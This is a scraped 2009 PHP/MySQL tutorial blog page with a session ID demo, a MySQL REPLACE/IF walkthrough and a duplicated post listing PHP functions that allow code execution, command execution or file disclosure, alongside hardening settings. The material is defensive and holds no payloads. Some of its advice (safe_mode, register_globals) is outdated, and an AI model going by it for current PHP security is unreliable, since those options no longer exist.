<?php
session_start();
?>
</HEAD>
<style type="text/css">
<!--
.style2 {color: #0066FF}
.style3 {
color: #009933;
font-weight: bold;
}
.style5 {color: #0066FF; font-weight: bold; }
-->
</style>
<BODY>
<strong>Displaying PHP SessionID by Tutorial Guide by http://www.phpmysqlquestion.blogspot.com/
</strong>
<h1 align="center" class="style2">Your PHPSESSID is: <?php echo session_id(); ?></h1>
<span class="style5">NOTE</span>: If you don't see a session id in tbe blue header above, hit <span
class="style3">REFRESH</span> on your browser <br />
<br />
<div align="center">Turotial by <a
href="http://www.phpmysqlquestion.blogspot.com/">http://www.phpmysqlquestion.blogspot.com/</a></div>
<p>
</BODY>
</HTML>
Friday, March 6, 2009
Friday, February 27, 2009
Difference between session-register and $_SESSION in PHP
Difference between session-register and $_SESSION in PHP
I read in the help http://www.php.net/session_register that using $_SESSION[var]=value is better than using session_register. It is because session_register() only works if register_globals is set ON in your php.ini file, but for security purposes this has been disabled by default since PHP 4.2.0 You should therefore use $_SESSION['var'] instead.
Wednesday, February 25, 2009
Using SELECT REPLACE with MySQL
I recently needed to compare the content of two columns in a MySQL database that stored the large and small images for a blog post. All the small ones start with "small" followed by a number and the large ones "big" followed by a number. Enter the REPLACE() function to get rid of small/large and do the comparison! In this post I show how to use the replace function in MySQL.
The REPLACE() function takes three parameters:
- the string or column name to do the replacement on
- what to look for
- and what to replace it with
The following example replaces the 'aaa' part of 'aaa bbb ccc' with 'xyz' and the column returned from the SQL query will contain 'xyz bbb ccc':
SELECT REPLACE('aaa bbb ccc', 'aaa', 'xyz');
If you were doing this against the column "foo" you would do this instead:
SELECT REPLACE(foo, 'aaa', 'xyz');
My example
In my case I had a column called 'image_small' and 'image_large' with example data like so:
+------------+--------------+-------------+
| content_id | image_small | image_large |
+------------+--------------+-------------+
| 1 | small1.jpg | big1.jpg |
| 26 | small26.jpg | big26.jpg |
| 27 | small27.jpg | big27.gif |
| 24 | small24.jpg | big24.jpg |
| 419 | small208.gif | big419.gif |
+------------+--------------+-------------+
I wanted to replace 'small' with an empty string and 'big' with an empty string in the select query, and then see if they were the same in each column. This can be done with the following query:
SELECT content_id, REPLACE( image_small, 'small', '' ) AS image_small, REPLACE( image_large, 'big', '' ) AS image_large FROM content The resulting data looks like this:
+------------+-------------+-------------+
| content_id | image_small | image_large |
+------------+-------------+-------------+
| 1 | 1.jpg | 1.jpg |
| 26 | 26.jpg | 26.jpg |
| 27 | 27.jpg | 27.gif |
| 24 | 24.jpg | 24.jpg |
| 419 | 208.gif | 419.gif |
+------------+-------------+-------------+
Extending my example with IF()
The only problem with the above example is that I now need to scan every row and see which ones do and dont' match. The query can be extended with an IF() to output 1 or 0 if the filenames (without the small and big parts) match.
SELECT content_id,
REPLACE(image_small, 'small', '') as image_small,
REPLACE(image_large, 'big', '') as image_large,
IF(REPLACE(image_small, 'small', '') = REPLACE(image_large, 'big', ''), 1, 0) AS matches
FROM content
This adds an extra column called "matches" which will display 1 if the two filenames match or 0 if they don't:
+------------+-------------+-------------+---------+
| content_id | image_small | image_large | matches |
+------------+-------------+-------------+---------+
| 1 | 1.jpg | 1.jpg | 1 |
| 26 | 26.jpg | 26.jpg | 1 |
| 27 | 27.jpg | 27.gif | 0 |
| 24 | 24.jpg | 24.jpg | 1 |
| 419 | 208.gif | 419.gif | 0 |
+------------+-------------+-------------+---------+
Now it's much easier to see which ones have the same filenames, once the 'small' and 'big' text has been removed by combining the REPLACE() and IF() MySQL functions.
Tuesday, February 24, 2009
Holes in PHP applications
Holes in PHP applications
PHP Code Execution
* require() and include() - Both these functions read a specified file and interpret the contents as PHP code
* eval() - Interprets a given string as PHP code
* preg_replace() - When used with the /e modifier this function interprets the replacement string as PHP code
Command Execution
* exec() - Executes a specified command and returns the last line of the programs output
* passthru() - Executes a specified command and returns all of the output directly to the remote browser
* `` (backticks) - Executes the specified command and returns all the output in an array
* system() - Much the same as passthru() but doesn't handle binary data
* popen() - Executes a specified command and connects its output or input stream to a PHP file descriptor
File Disclosure
* fopen() - Opens a file and associates it with a PHP file descriptor
* readfile() - Reads a file and writes its contents directly to the remote browser
* file() - Reads an entire file into an array
Configuration
* Set register_globals off - This option will stop PHP creating global variables for user input. That is, if a user submits the form variable 'hello' PHP won't set $hello, only HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is best single option for PHP security, it will also kill basically every third party application available and makes programming PHP a whole lot less convenient.
* Set safe_mode on - this introduces a large variety of restrictions including:
o The ability to restrict which commands can be executed (by exec() etc)
o The ability to restrict which functions can be used
o Restricts file access based on ownership of script and target file
o Kills file upload completely
This is a great option for ISP environments (for which it is designed) but it can also greatly improve the security of normal PHP environments given proper configuration. See the Safe Mode manual page for details.
* Set open_basedir This option prevents any file operations on files outside specified directories. This can effectively kill a variety of local include() and remote file attacks. Caution is still required in regards to file upload and session files.
* Set display_errors off, log_errors on This prevents PHP error messages being displayed in the returned web page. This can effectively limit an attackers exploration of the function of the script they are attacking. It can also make debugging very frustrating.
* Set allow_url_fopen off This stops remote files functionality. Very few sites really need this functionality.
PHP Code Execution
* require() and include() - Both these functions read a specified file and interpret the contents as PHP code
* eval() - Interprets a given string as PHP code
* preg_replace() - When used with the /e modifier this function interprets the replacement string as PHP code
Command Execution
* exec() - Executes a specified command and returns the last line of the programs output
* passthru() - Executes a specified command and returns all of the output directly to the remote browser
* `` (backticks) - Executes the specified command and returns all the output in an array
* system() - Much the same as passthru() but doesn't handle binary data
* popen() - Executes a specified command and connects its output or input stream to a PHP file descriptor
File Disclosure
* fopen() - Opens a file and associates it with a PHP file descriptor
* readfile() - Reads a file and writes its contents directly to the remote browser
* file() - Reads an entire file into an array
Configuration
* Set register_globals off - This option will stop PHP creating global variables for user input. That is, if a user submits the form variable 'hello' PHP won't set $hello, only HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is best single option for PHP security, it will also kill basically every third party application available and makes programming PHP a whole lot less convenient.
* Set safe_mode on - this introduces a large variety of restrictions including:
o The ability to restrict which commands can be executed (by exec() etc)
o The ability to restrict which functions can be used
o Restricts file access based on ownership of script and target file
o Kills file upload completely
This is a great option for ISP environments (for which it is designed) but it can also greatly improve the security of normal PHP environments given proper configuration. See the Safe Mode manual page for details.
* Set open_basedir This option prevents any file operations on files outside specified directories. This can effectively kill a variety of local include() and remote file attacks. Caution is still required in regards to file upload and session files.
* Set display_errors off, log_errors on This prevents PHP error messages being displayed in the returned web page. This can effectively limit an attackers exploration of the function of the script they are attacking. It can also make debugging very frustrating.
* Set allow_url_fopen off This stops remote files functionality. Very few sites really need this functionality.
Subscribe to:
Comments (Atom)